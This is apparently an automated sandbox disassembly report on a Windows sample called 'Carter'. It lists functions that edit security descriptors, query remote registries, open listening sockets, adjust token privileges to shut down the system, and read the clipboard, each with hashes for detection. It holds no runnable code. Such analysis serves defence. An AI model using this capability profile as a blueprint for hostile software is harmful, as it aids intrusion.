API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: ea5445a209bf3c27448e61914b81d3ab9bb8e952d685c59609db68aacb44dd1b
Instruction ID: 73f3250ee3980b0f280d403a77e19309a296fe42ea2c74d5fc1b73cf4508da9a
Opcode Fuzzy Hash: ea5445a209bf3c27448e61914b81d3ab9bb8e952d685c59609db68aacb44dd1b
Instruction Fuzzy Hash: BE31B57650021AAADB149BB4DC4CADE77AC9F0A326F200179EC14A21E1D770DFCE9B58

Function 00C488CD Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C48E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C48E3C
Part of subcall function 00C48E20: GetLastError.KERNEL32(?,00C48900,?,?,?), ref: 00C48E46
Part of subcall function 00C48E20: GetProcessHeap.KERNEL32(00000008,?,?,00C48900,?,?,?), ref: 00C48E55
Part of subcall function 00C48E20: HeapAlloc.KERNEL32(00000000,?,00C48900,?,?,?), ref: 00C48E5C
Part of subcall function 00C48E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C48E73

Part of subcall function 00C48EBD: GetProcessHeap.KERNEL32(00000008,00C48916,00000000,00000000,?,00C48916,?), ref: 00C48EC9
Part of subcall function 00C48EBD: HeapAlloc.KERNEL32(00000000,?,00C48916,?), ref: 00C48ED0
Part of subcall function 00C48EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00C48916,?), ref: 00C48EE1

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C48931
_memset.LIBCMT ref: 00C48946
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C48965
GetLengthSid.ADVAPI32(?), ref: 00C48976
GetAce.ADVAPI32(?,00000000,?), ref: 00C489B3
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C489CF
GetLengthSid.ADVAPI32(?), ref: 00C489EC
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00C489FB
HeapAlloc.KERNEL32(00000000), ref: 00C48A02
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C48A23
CopySid.ADVAPI32(00000000), ref: 00C48A2A
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C48A5B
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C48A81
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C48A95

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 1ecb25cd96a7e54c12009070cbdbb80c901ed51727d3161684bfdf2da99a5ae0
Instruction ID: 6665d3e8c702e9fd0f3446e89c6d801cc59430bc14f9e5621b6fa9065f8d91d6
Opcode Fuzzy Hash: 1ecb25cd96a7e54c12009070cbdbb80c901ed51727d3161684bfdf2da99a5ae0
Instruction Fuzzy Hash: E4614875900209BFDF01DFA5EC49BAEBB79FF04304F14812AE925A6290DB759A09DB60

Function 00C70A3A Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C7147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C7040D,?,?), ref: 00C71491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C70B0C

Part of subcall function 00BF4D37: __itow.LIBCMT ref: 00BF4D62
Part of subcall function 00BF4D37: __swprintf.LIBCMT ref: 00BF4DAC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00C70BAB
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00C70C43
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00C70E82
RegCloseKey.ADVAPI32(00000000), ref: 00C70E8F

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 5e61098ae892aee816936467fd19975a51a3d92548ce29a6458ae81568622004
Instruction ID: 7eef8fbfb78ebf8ece0c059745a2dccad61a61ce0f974f9855d95892eb23f6cd
Opcode Fuzzy Hash: 5e61098ae892aee816936467fd19975a51a3d92548ce29a6458ae81568622004
Instruction Fuzzy Hash: 36E12931204214AFC714DF25C895E2ABBE9EF89714F14896DF89ADB2A1DB30ED05CB52

Function 00C5443D Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 00C54451
__swprintf.LIBCMT ref: 00C5445E

Part of subcall function 00C138C8: __woutput_l.LIBCMT ref: 00C13921

FindResourceW.KERNEL32(?,?,0000000E), ref: 00C54488
LoadResource.KERNEL32(?,00000000), ref: 00C54494
LockResource.KERNEL32(00000000), ref: 00C544A1
FindResourceW.KERNEL32(?,?,00000003), ref: 00C544C1
LoadResource.KERNEL32(?,00000000), ref: 00C544D3
SizeofResource.KERNEL32(?,00000000), ref: 00C544E2
LockResource.KERNEL32(?), ref: 00C544EE
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00C5454F

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: c5de49f7962587dc94723acddc5de1235f758706380b40c80b7464c273a16ddb
Instruction ID: b383707ca44805a1e3970e662a8d1915137ceb643a7f6bdfa0911f940dd39db6
Opcode Fuzzy Hash: c5de49f7962587dc94723acddc5de1235f758706380b40c80b7464c273a16ddb
Instruction Fuzzy Hash: 5D31E17550121AABDB199FA0EC48BBF7BADEF04306F504425FD12D3150E770DA99CB68

Function 00C64830 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00C64857
EmptyClipboard.USER32 ref: 00C6485D
GlobalAlloc.KERNEL32(00000002,?), ref: 00C64872
CloseClipboard.USER32 ref: 00C64911

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 70af258012d37e334e408b12d2cc3fda9e8bdaddb74bffd2757baeaafeef5868
Instruction ID: 397f19da8c485d436e7ca3cd0a807b1e84216f1a92f96ae264ea947429f1b6ec
Opcode Fuzzy Hash: 70af258012d37e334e408b12d2cc3fda9e8bdaddb74bffd2757baeaafeef5868
Instruction Fuzzy Hash: 5921C435201210DFDB15AF60EC49B2E7BA8FF84721F118159FE06DB2A1DB70AD14CB99

Function 00C5FA36 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00C01A36: _memmove.LIBCMT ref: 00C01A77

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00C5FA83
FindClose.KERNEL32(00000000), ref: 00C5FB96

Part of subcall function 00BF52B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BF52E6

Sleep.KERNEL32(0000000A), ref: 00C5FAB3
_wcscmp.LIBCMT ref: 00C5FAC7
_wcscmp.LIBCMT ref: 00C5FAE2
FindNextFileW.KERNEL32(?,?), ref: 00C5FB80

Strings

*.*, xrefs: 00C5FA68

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
String ID: *.*
API String ID: 2185952417-438819550
Opcode ID: f77e368b6973c339849c3e61044870898fc6aea1f723565f51a8527b635401fc
Instruction ID: 2f599e5d3627a66d19edf70b8cfa3213c5c7987e8353dbe5754a44df447afe0c
Opcode Fuzzy Hash: f77e368b6973c339849c3e61044870898fc6aea1f723565f51a8527b635401fc
Instruction Fuzzy Hash: F441AD7590020AAFCF18DF64CC58AEEBBB4FF05351F14416AEC14A2291EB309F89DB94

Function 00C55778 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00C49399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C493E3
Part of subcall function 00C49399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C49410
Part of subcall function 00C49399: GetLastError.KERNEL32 ref: 00C4941D

ExitWindowsEx.USER32(?,00000000), ref: 00C557B4

Strings

@, xrefs: 00C557A7
SeShutdownPrivilege, xrefs: 00C55784
, xrefs: 00C557A2

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 48b7aef2d886da15296b055f49086b4b56c5c1ae07496a16a70a70f538592427
Instruction ID: 1ccf95aede8ebae0db8588e0450b5c584b05a07119497cfdecda5c533d5272e3
Opcode Fuzzy Hash: 48b7aef2d886da15296b055f49086b4b56c5c1ae07496a16a70a70f538592427
Instruction Fuzzy Hash: AE01FC39761712EAE76852B59C6ABBF7258EB097D2F200025FC23D60D2D9505D8C816C

Function 00C6696E Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00C669C7
WSAGetLastError.WSOCK32(00000000), ref: 00C669D6
bind.WSOCK32(00000000,?,00000010), ref: 00C669F2
listen.WSOCK32(00000000,00000005), ref: 00C66A01
WSAGetLastError.WSOCK32(00000000), ref: 00C66A1B
closesocket.WSOCK32(00000000,00000000), ref: 00C66A2F

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 19e4931c000d89ea24e08c34cbb8ec2775010ec05eb42f66b08862d7516cebe1
Instruction ID: a2b4a902408423efb10b54339e44fdb302097bb64c827ee163b3b32e2bb5cf1a
Opcode Fuzzy Hash: 19e4931c000d89ea24e08c34cbb8ec2775010ec05eb42f66b08862d7516cebe1
Instruction Fuzzy Hash: 4D21D2352002049FCB20EF64C889B3EB7E9EF44720F148158EA16A73D2CB30AD05DB90

Function 00BF1663 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00BF29E2: GetWindowLongW.USER32(?,000000EB), ref: 00BF29F3

DefDlgProcW.USER32(?,?,?,?,?), ref: 00BF1DD6
GetSysColor.USER32(0000000F), ref: 00BF1E2A
SetBkColor.GDI32(?,00000000), ref: 00BF1E3D

Part of subcall function 00BF166C: DefDlgProcW.USER32(?,00000020,?), ref: 00BF16B4

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 5802a69c7eb2330f555d53c52f5665f0912cba19da441c9a236607a43dc91e8f
Instruction ID: e30072b0ac031591c81d7df878e7cda1930d571cea6b58a9550dafe793e7b5d8
Opcode Fuzzy Hash: 5802a69c7eb2330f555d53c52f5665f0912cba19da441c9a236607a43dc91e8f
Instruction Fuzzy Hash: A4A1767810541CFAD628AB6D9C89EBF36ECDF81305F204EAAF602D7581CA319E09D375

Function 00C5C2FF Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00C5C329
_wcscmp.LIBCMT ref: 00C5C359
_wcscmp.LIBCMT ref: 00C5C36E
FindNextFileW.KERNEL32(00000000,?), ref: 00C5C37F
FindClose.KERNEL32(00000000,00000001,00000000), ref: 00C5C3AF

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: e1c6ae9ea36c6dd44c531b44f843a8bc13238899467be73949aaa90fd246bc0b
Instruction ID: 8ea0aff885bbeb1f276111752a0811a43b77d6ce061b6f89fdcda399d04c10ee
Opcode Fuzzy Hash: e1c6ae9ea36c6dd44c531b44f843a8bc13238899467be73949aaa90fd246bc0b
Instruction Fuzzy Hash: B551AC396047068FC714DF68C4D0EAAB3E4FF49325F10466DE9668B3A1DB30AD49CB95

Function 00C66E32 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00C68475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00C684A0

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00C66E89
WSAGetLastError.WSOCK32(00000000), ref: 00C66EB2
bind.WSOCK32(00000000,?,00000010), ref: 00C66EEB
WSAGetLastError.WSOCK32(00000000), ref: 00C66EF8
closesocket.WSOCK32(00000000,00000000), ref: 00C66F0C

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: 5f6cc192b38c72ca1e1ceca31e8ec4cc0e8c049f867595fd573d64afb0444df2
Instruction ID: 938966cb29cf66fb37d82d93cced8d6bf133f3f90c4fa3bd4f7b55eaf4fe552d
Opcode Fuzzy Hash: 5f6cc192b38c72ca1e1ceca31e8ec4cc0e8c049f867595fd573d64afb0444df2
Instruction Fuzzy Hash: 9D41A475600614AFDB20AF64DC86F7FB7E89B44714F0485A8FA19AB3D2DB709D048B91

Function 00C759B3 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00C75A02
IsWindowEnabled.USER32 ref: 00C75A10
GetForegroundWindow.USER32(?,?,00000001), ref: 00C75A1D
IsIconic.USER32 ref: 00C75A2B
IsZoomed.USER32 ref: 00C75A39

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 999d4ddd308d041c91891b8de82ea250067eca466a4ea496d6a75434301e8d69
Instruction ID: cb58a08ec9de92f46a105e1c19d2e00d52dcff9afd8cc779c4651e4e8817e247
Opcode Fuzzy Hash: 999d4ddd308d041c91891b8de82ea250067eca466a4ea496d6a75434301e8d69
Instruction Fuzzy Hash: 8C11B276300A159BE7215F269C84B3F7B99EF84771F108139F91AD7241DBB09E028AA4

Function 00C30030 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00C30034
__swprintf.LIBCMT ref: 00C30065

Strings

%.3d, xrefs: 00C3003F
WIN_XPe, xrefs: 00C300A4

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: e216243f5ecbfffa7fcac9d02aaa4458dd312f638ae2e4c681c26f4ced10f7c0
Instruction ID: 38cc538e5021f8433a04d72b9c7c97b8aba04fa63fa81af91c85b7c4e67281e8
Opcode Fuzzy Hash: e216243f5ecbfffa7fcac9d02aaa4458dd312f638ae2e4c681c26f4ced10f7c0
Instruction Fuzzy Hash: DFD01273868109EAC74C9B91C965EFA77BCBB05304F300092F506A2040D735878CAB26

Function 00C629BA Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00C61ED6,00000000), ref: 00C62AAD
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00C62AE4

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 629cb82f3f8146dc31fcb4f94d558a3c6b8d06c607c84669b97c56c04ac39085
Instruction ID: c1d77591023a4002ce007e623cc4ee82af457db1ec5acb57878aa044b2d0e068
Opcode Fuzzy Hash: 629cb82f3f8146dc31fcb4f94d558a3c6b8d06c607c84669b97c56c04ac39085
Instruction Fuzzy Hash: 0D418771604A09FFEB30DE95CCC5EBFB7ACEB80754F10405EFA15A6141D6B19E41A760

Function 00C49399 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00C10FE6: std::exception::exception.LIBCMT ref: 00C1101C
Part of subcall function 00C10FE6: __CxxThrowException@8.LIBCMT ref: 00C11031

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C493E3
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C49410
GetLastError.KERNEL32 ref: 00C4941D

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 5a228290047c07403e6efc8b930ce9083f226dfd6a9eb232ec28629ffbc0f35b
Instruction ID: 8f143315583347afa0079e90a64f4e8f6721e80474f64c5fe415145d14f4890a
Opcode Fuzzy Hash: 5a228290047c07403e6efc8b930ce9083f226dfd6a9eb232ec28629ffbc0f35b
Instruction Fuzzy Hash: 58118FB1414205AFD728DF54DCC6E6FB7BCFB49710B21852EE45A93250EB70AC41CB64

Function 00C542D5 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00C542FF
DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 00C5433C
CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00C54345

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: f868835bb872b80196d4ba520f0911bf43bc040e9a501863fdd434f942239650
Instruction ID: 6d2d047ac8b9ac6396f8fd52ceaed49d1d600ee801cf9fc2b3ebb587c26c4ec2
Opcode Fuzzy Hash: f868835bb872b80196d4ba520f0911bf43bc040e9a501863fdd434f942239650
Instruction Fuzzy Hash: F41186B1900225BEE7109BE8DC44FBFB7BCEB08725F100156FD14E71A1C2749E8887A5

Function 00C54F1C Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00C54F45
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00C54F5C
FreeSid.ADVAPI32(?), ref: 00C54F6C

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

